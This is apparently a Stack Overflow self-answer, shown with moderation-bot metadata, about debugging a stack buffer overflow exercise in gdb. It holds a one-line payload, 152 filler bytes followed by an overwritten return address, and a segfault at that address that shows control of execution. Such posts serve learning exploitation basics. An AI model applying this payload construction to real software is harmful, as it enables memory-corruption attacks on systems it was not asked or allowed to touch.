79174226

Date: 2024-11-10 06:04:05
Score: 3
Natty:
Report link

Finally, thanks to @Jester, encoding was the problem.

(gdb) r $(python3 -c 'import sys; sys.stdout.buffer.write(b"\x41"*152 + b"\x70\xe3\xff\xff\xff\x7f")')

Solved the isssue.

Same procedure as above gets

Program received signal SIGSEGV, Segmentation fault.
0x00007fffffffe370 in ?? ()
Reasons:
  • Blacklisted phrase (0.5): thanks
  • Low length (0.5):
  • Has code block (-0.5):
  • User mentioned (1): @Jester
  • Self-answer (0.5):
  • Low reputation (1):
Posted by: user27263189